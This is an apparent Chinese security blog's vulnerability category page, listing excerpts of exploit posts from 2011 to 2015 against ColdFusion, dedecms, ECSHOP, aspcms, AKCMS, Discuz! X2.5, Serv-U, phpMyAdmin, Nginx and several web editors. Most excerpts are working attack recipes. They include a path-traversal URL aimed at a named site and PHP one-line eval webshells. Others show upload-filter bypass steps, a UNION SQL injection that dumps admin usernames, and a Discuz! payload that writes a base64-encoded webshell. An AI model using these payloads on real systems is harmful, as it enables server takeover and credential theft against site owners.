文章分类 -  漏洞

ColdFusion 9 / 10 Remote Root xday
摘要:www.awsurveys.com//CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../.... 阅读全文

posted @ 2015-04-26 01:53 =_=! 阅读(372) 评论(0) 推荐(0)

攻击ColdFusion2 –路径遍历漏洞攻略
摘要:编号:CVE-2010-2861 APSB10-18‘locale’ Path Traversal Vulnerability detected影响版本:ColdFusion MX6 6.1 base patches ColdFusion MX7 7,0,0,91690 base patches ... 阅读全文

posted @ 2014-05-07 21:43 =_=! 阅读(856) 评论(0) 推荐(0)

韩国某编辑器HABYeditor鸡肋漏洞!
摘要:直接写htm文件,文件名:tmpcontent.htm:直接上传htm文件:文件名:tmpcontent.htm写个htm文件到服务器你们会发现会解析的!编辑器判断方法:editor/historyeditor/licenseeditor/htmlareaeditor/samples/sample_euckr.htmeditor/samples/sample_utf8.htmeditor/filemanager/php/upload.phpeditor/filemanager/php/savecontent.phpeditor/filemanager/php/filemanager_lib.p 阅读全文

posted @ 2013-08-05 21:31 =_=! 阅读(382) 评论(0) 推荐(0)

dedecms利用xss+csrf getshell
摘要:dedecms的漏洞很多,但是厂商都是不做修复。之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。 后台可触发xss 利用js代码 01 varrequest =false; 02 if(window.XMLHttpRequest) { 03 request =newXM... 阅读全文

posted @ 2013-06-06 18:15 =_=! 阅读(671) 评论(0) 推荐(0)

ECSHOP网站程序可以绕过权限上传一句话木马
摘要:可以绕过权限上传一句话木马前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)备份文件名:xxx.php;.sql 这种格式来备份提示成功了。一句话连接成功 阅读全文

posted @ 2013-05-20 23:21 =_=! 阅读(528) 评论(0) 推荐(0)

DotNetTextBox编辑器漏洞,可上传任意文件
摘要:otNetTextBox编辑器洞洞文件上传漏洞1、用firebug将disabled="disabled',value="jgp,gif,png"修改为enabled="enabled",value="jpg,gif,png,aspx",然后点更新成功按钮2、弹出更新成功3、刷新页面,发现此时可允许上传的图片类型,成功新增aspx类型4、找个aspx webshell上传、提示文件上传成功5、上传成功、成功躺在那里6、webshell页面 阅读全文

posted @ 2013-05-03 18:33 =_=! 阅读(328) 评论(0) 推荐(0)

aspcms注入 cookies欺骗及修复
摘要:漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转,所以要快,建议用快捷键复制爆用户名/plug/productbuy.asp?id=2 union select 1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4………..爆密码/plug/pr 阅读全文

posted @ 2012-10-13 21:54 =_=! 阅读(666) 评论(0) 推荐(0)

AKCMS后台拿Webshell
摘要:模板中写入以下内<{php}>fputs(fopen(“./0x80c.php”,”w”),”<?eval(\$_POST[0x80c]);?>”)<{/php}>然后管理员密码可以注入获取http://www.2cto.com /akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0×27,password,0×27, 阅读全文

posted @ 2012-09-25 04:06 =_=! 阅读(351) 评论(0) 推荐(0)

汇成装潢行业企业网站系统vII2.1注入漏洞利用
摘要:产品介绍: 拥有企业网站常用的模块功能:企业简介模块、联系我们模块、新闻(文章)模块、产品 模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、 栏目管理、网站碎片、管理员与权限管理等等,所有模块的分类均支持无限级别的分类 ,可拓展性非常强大。其中包括万能的栏目管理系统、网站碎片管理系统,通过这些系 统,可以组合出各种不同的页面和应用。系统带强大灵活的后台管理功能、支持伪静态 URL页面功能、自定义Banner、LOGO功能等可为企业打造出大气漂亮且具有营销力的公 司网站。漏洞文件:shownews.asp使用穿山甲cookie注入工具 爆破管理用户名工具下载地址htt 阅读全文

posted @ 2012-08-14 03:17 =_=! 阅读(186) 评论(0) 推荐(0)

Discuz! X2.5 远程代码执行漏洞及EXP
摘要:利用方法:1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.访问日志,论坛根目录下生成demo.php,一句发密码C 阅读全文

posted @ 2012-08-03 06:41 =_=! 阅读(1270) 评论(0) 推荐(0)

Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
摘要:[*]----------------------------------------------------[*]Serv-U FTP Server Jail Break 0dayDiscovered By KingcopeYear 2011[*]----------------------------------------------------[*]/*通过构造..:/来遍历服务器目录,下载任意文件影响版本:6.4,7.1,7.3,8.2,10.5*/Affected:220 Serv-U FTP Server v7.3 ready...220 Serv-U FTP Server v7 阅读全文

posted @ 2011-12-13 12:08 =_=! 阅读(578) 评论(0) 推荐(0)

韩国Ezshop编辑器欺骗上传漏洞
摘要:漏洞文件: ezshop/editor/demo.php利用图片后门欺骗上传。 上传后路径是:ezshop/editor/uploaded/img/ Or :ezshop/editor/img/ 阅读全文

posted @ 2011-11-06 18:32 =_=! 阅读(293) 评论(0) 推荐(0)

PhpMyadmin任意文件读取漏洞
摘要:漏洞详情简要描述:PhpMyadmin实现中错误的使用了simplexml_load_string函数用于xml解析,但是该函数中默认并没有处理好外部实体的安全性,导致用户可以借助xml文件读取和访问应用有权限访问的系统和网络资源详细说明:libraries/import/xml.php中unset($data);/** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * al 阅读全文

posted @ 2011-11-06 10:58 =_=! 阅读(2456) 评论(0) 推荐(0)

Nginx最新0day
摘要:昨晚黑锅在微博上发了老外爆的Nginx漏洞,开始并没几个人关注,小我马上架环境测试验证了,我人品好随手在网上试了两个网站也验证了这个漏洞,于是乎马上就在微博上传开了。这个漏洞是7月20日发的,老外做了非常详细的分析,大家可以深入参考:https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/这里我就说说关于这个漏洞的几个隐蔽点和关键点:一.老肉鸡变新肉鸡大家应该还记得80sec发的nginx文件类型错误解析漏洞吧http:/ 阅读全文

posted @ 2011-09-02 08:57 =_=! 阅读(443) 评论(0) 推荐(0)

网页编辑器漏洞手册FCKeditor,eWebEditor,WebEditorNet,bigcneditor,CuteEditor
摘要:FCKeditorFCKeditor编辑器页/查看编辑器版本/查看文件上传路径FCKeditor编辑器页FCKeditor/_samples/default.html查看编辑器版本FCKeditor/_whatsnew.html查看文件上传路径fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径Note:[Hell 阅读全文

posted @ 2011-04-17 23:27 =_=! 阅读(584) 评论(0) 推荐(0)

导航